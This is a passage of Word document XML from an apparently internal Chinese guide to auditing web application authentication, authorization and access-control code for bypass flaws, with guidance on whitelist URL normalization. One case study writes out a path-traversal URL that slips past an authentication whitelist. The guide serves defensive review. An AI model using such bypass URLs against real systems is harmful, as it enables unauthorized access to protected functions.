        <w:t>排查内容：</w:t>
      </w:r>
      <w:r w:rsidR="000278A2" w:rsidRPr="000278A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>排查</w:t>
      </w:r>
      <w:r w:rsidRPr="00957D2B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证、鉴权、访问控制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模块实现代码及配置文件</w:t>
      </w:r>
      <w:r w:rsidR="000278A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，确保</w:t>
      </w:r>
      <w:r w:rsidR="000278A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="000278A2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用系统不存在认证、鉴权、访问控制被绕过漏洞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0019737D" w:rsidRDefault="001F0BB1" w:rsidP="00E31127">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="001F0BB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>排查工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00E31127" w:rsidRPr="00661F0C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了方便产品的排查，提高排查效率，能力中心在敏感词搜索工具中定制了此次排查的关键词，可以帮助产品将排查范围相对缩小。具体工具下载及使用说明见：</w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidR="0019737D" w:rsidRPr="00192CA8">
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>http://10.175.45.132:8080/nsccp-portal/topic/toTopicReply?topicId=2864</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0019737D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F0BB1" w:rsidRPr="005B450D" w:rsidRDefault="00E31127" w:rsidP="00E31127">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00661F0C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用敏感词搜索工具时请使用“</w:t>
      </w:r>
      <w:r w:rsidRPr="00661F0C">
        <w:t xml:space="preserve">Weak authentication </w:t>
      </w:r>
      <w:r w:rsidR="009C7000" w:rsidRPr="00661F0C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="00661F0C">
        <w:t>authorization</w:t>
      </w:r>
      <w:r w:rsidRPr="00661F0C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”敏感词模板</w:t>
      </w:r>
      <w:r w:rsidR="0019737D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="0019737D" w:rsidRPr="00661F0C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidR="0019737D" w:rsidRPr="0019737D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>认证、鉴权、访问控制模块实现代码</w:t>
      </w:r>
      <w:r w:rsidR="0019737D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r w:rsidR="0081171F" w:rsidRPr="00661F0C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索</w:t>
      </w:r>
      <w:r w:rsidR="00B56252" w:rsidRPr="00661F0C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00B56252" w:rsidRPr="00661F0C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>对搜索到关键词</w:t>
      </w:r>
      <w:r w:rsidR="00EC4E12" w:rsidRPr="00661F0C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidR="00B56252" w:rsidRPr="00661F0C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>上下文代码</w:t>
      </w:r>
      <w:r w:rsidR="0019737D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>请按第六章的</w:t>
      </w:r>
      <w:r w:rsidR="0019737D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>排查指导内容</w:t>
      </w:r>
      <w:r w:rsidR="00B56252" w:rsidRPr="00661F0C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>重点排查</w:t>
      </w:r>
      <w:r w:rsidR="00B56252" w:rsidRPr="00661F0C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B343A9" w:rsidRPr="001723D8" w:rsidRDefault="00B343A9" w:rsidP="004C22E0">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00454DB8" w:rsidRDefault="0088109A" w:rsidP="00454DB8">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>排查指导</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00573F3B" w:rsidRPr="00573F3B" w:rsidRDefault="00B96006" w:rsidP="00573F3B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:object w:dxaOrig="8154" w:dyaOrig="7974">
          <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:325.45pt;height:317.4pt" o:ole="">
            <v:imagedata r:id="rId23" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1028" DrawAspect="Content" ObjectID="_1499847735" r:id="rId24"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A63D2" w:rsidRDefault="009D259E" w:rsidP="009A63D2">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>排查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用系统中的认证、鉴权模块是否自研</w:t>
      </w:r>
      <w:r w:rsidR="009A63D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C42FE" w:rsidRPr="00A81764" w:rsidRDefault="006855DC" w:rsidP="00E428A6">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="839" w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A81764">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>认证、鉴权模块使用了业界成熟的框架（如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A81764">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Spring Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00A81764">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A81764">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Shiro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A81764">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>等）</w:t>
      </w:r>
      <w:r w:rsidR="00A84480" w:rsidRPr="00A81764">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>提供的认证、鉴权机制</w:t>
      </w:r>
      <w:r w:rsidRPr="00A81764">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006855DC" w:rsidRDefault="00A6239B" w:rsidP="00E428A6">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="839" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于使用业界</w:t>
      </w:r>
      <w:r w:rsidR="00E428A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成熟框架</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的应用请重点做好</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的排查。确保系统的权限设置合理全面，没有遗漏。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006855DC" w:rsidRPr="00A81764" w:rsidRDefault="00E428A6" w:rsidP="00D01874">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="839" w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A81764">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>产品</w:t>
      </w:r>
      <w:r w:rsidR="006855DC" w:rsidRPr="00A81764">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>自研认证、鉴权模块</w:t>
      </w:r>
      <w:r w:rsidRPr="00A81764">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00752FAF" w:rsidRPr="006855DC" w:rsidRDefault="00E428A6" w:rsidP="00271141">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="839" w:firstLineChars="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于自研认证、鉴权模块的产品，需认真做好</w:t>
      </w:r>
      <w:r w:rsidR="000E0F80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="000E0F80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的排查，确保认证、鉴权模块</w:t>
      </w:r>
      <w:r w:rsidR="00D01874">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现逻辑的严谨</w:t>
      </w:r>
      <w:r w:rsidR="009C2513">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，权限设置的合理全面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007168E2" w:rsidRDefault="007168E2" w:rsidP="009A63D2">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>排查</w:t>
      </w:r>
      <w:r w:rsidR="00752FAF">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自研认证模块中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证白名单的实现</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007168E2" w:rsidRDefault="007168E2" w:rsidP="006248DE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用系统中总有一些页面和资源是允许匿名访问的（如常见的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.gif</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>静态文件），也就不需要进行认证和鉴权，对这样的匿名访问资源系统中往往维护有一份白名单列表，对</w:t>
      </w:r>
      <w:r w:rsidR="0016660F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>白</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名单的实现逻辑和白名单列表需要重点排查。排查项目包括但不限于：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D441D5" w:rsidRPr="00752B40" w:rsidRDefault="00E648F5" w:rsidP="00FD77BA">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF3DC1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>认证白名单是否依赖未标准化的URL作为判断依据。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00752B40" w:rsidRPr="00D441D5" w:rsidRDefault="00752B40" w:rsidP="00752B40">
      <w:pPr>
        <w:pStyle w:val="af5"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="840" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重点排查</w:t>
      </w:r>
      <w:r w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00311339">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言中</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00746EC2">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>request.getRequestURL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00746EC2">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>request.getRequestUR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00746EC2">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00752B40">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的使用，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言开发的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CGI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中请确认是否做了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标准化处理。</w:t>
      </w:r>
      <w:r w:rsidR="0099647A">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果未作</w:t>
      </w:r>
      <w:r w:rsidR="0099647A">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="0099647A">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>标准化操作，</w:t>
      </w:r>
      <w:r w:rsidR="007275DE">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请确认是否</w:t>
      </w:r>
      <w:r w:rsidR="00A1390E">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在</w:t>
      </w:r>
      <w:r w:rsidR="007275DE">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可通过</w:t>
      </w:r>
      <w:r w:rsidR="007275DE">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="007275DE">
        <w:rPr>
          <w:rFonts w:cs="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作绕过认证的场景。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D441D5" w:rsidRPr="00062AA2" w:rsidRDefault="00700DC0" w:rsidP="00062AA2">
      <w:pPr>
        <w:ind w:left="838"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>案例2.1</w:t>
      </w:r>
      <w:r w:rsidR="00E648F5" w:rsidRPr="00FD77BA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E648F5" w:rsidRPr="00FD77BA">
        <w:t>request.getRequestURL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E648F5" w:rsidRPr="00FD77BA">
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00E648F5" w:rsidRPr="00FD77BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E648F5" w:rsidRPr="00FD77BA">
        <w:t>request.getRequestUR</w:t>
      </w:r>
      <w:r w:rsidR="00E648F5" w:rsidRPr="00FD77BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E648F5" w:rsidRPr="00FD77BA">
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00E648F5" w:rsidRPr="00FD77BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r w:rsidR="00E648F5" w:rsidRPr="00FD77BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00E648F5" w:rsidRPr="00FD77BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址做为判断依据，</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD77BA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00700DC0">
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00700DC0">
        <w:rPr>
          <w:color w:val="1D27F3"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ip/path/login.action</w:t>
      </w:r>
      <w:r w:rsidRPr="00700DC0">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/../</w:t>
      </w:r>
      <w:r w:rsidRPr="00700DC0">
        <w:rPr>
          <w:color w:val="1D27F3"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>business.action;logout.action?BMECIDClosing=1</w:t>
      </w:r>
      <w:r w:rsidR="00D441D5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007168E2" w:rsidRPr="00FD77BA" w:rsidRDefault="00700DC0" w:rsidP="00D441D5">
      <w:pPr>
        <w:ind w:left="838"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00700DC0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>案例</w:t>
      </w:r>
      <w:r w:rsidRPr="00700DC0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00E648F5" w:rsidRPr="00FD77BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用未做任何标准化的</w:t>
      </w:r>
      <w:r w:rsidR="00E648F5" w:rsidRPr="00FD77BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00E648F5" w:rsidRPr="00FD77BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做为判断依据，</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD77BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E648F5" w:rsidRPr="00FD77BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00E648F5" w:rsidRPr="00FD77BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00E648F5" w:rsidRPr="00FD77BA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
          <w:color w:val="1D27F3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00E648F5" w:rsidRPr="00FD77BA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="1D27F3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="pct15" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1.css</w:t>
      </w:r>
      <w:r w:rsidR="00E648F5" w:rsidRPr="00FD77BA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsiTheme="minorHAnsi" w:cs="宋体"/>
